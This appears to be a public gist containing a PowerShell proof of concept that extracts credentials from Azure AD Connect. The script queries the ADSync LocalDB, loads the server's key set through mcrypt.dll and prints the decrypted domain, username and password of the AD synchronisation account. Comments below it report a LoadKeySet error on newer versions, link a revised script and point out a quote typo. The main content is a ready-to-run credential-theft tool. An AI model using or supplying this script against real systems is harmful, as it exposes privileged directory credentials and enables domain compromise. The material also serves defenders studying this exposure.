```powershell
Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

# Connect to the ADSync LocalDB instance that Azure AD Connect uses for its configuration
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
$client.Open()

# Read the key set id, instance id and entropy needed to load the server's key set
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

# Read the AD management agent's configuration: plaintext XML plus the encrypted blob
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

# Load the key set through the KeyManager class shipped in mcrypt.dll and decrypt the blob
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

# Domain and username come from the plaintext XML; the password from the decrypted XML
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
```
It is not working anymore. I am getting an error on line 24, even after correcting the quote on line 22:
```powershell
PS C:\Program Files\Microsoft Azure AD Sync\bin> add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
PS C:\Program Files\Microsoft Azure AD Sync\bin> $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
PS C:\Program Files\Microsoft Azure AD Sync\bin> $km.LoadKeySet($entropy, $instance_id, $key_id)
Exception calling "LoadKeySet" with "3" argument(s): "The system cannot find the file specified. (Exception from HRESULT: 0x80070002)"
At line:1 char:1
+ $km.LoadKeySet($entropy, $instance_id, $key_id)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : FileNotFoundException
```
It looks like Microsoft have made a few changes to how the keys are stored. A new script is up which shows one way around this: https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
Typo on line 22: the closing quote should be the same as the opening one...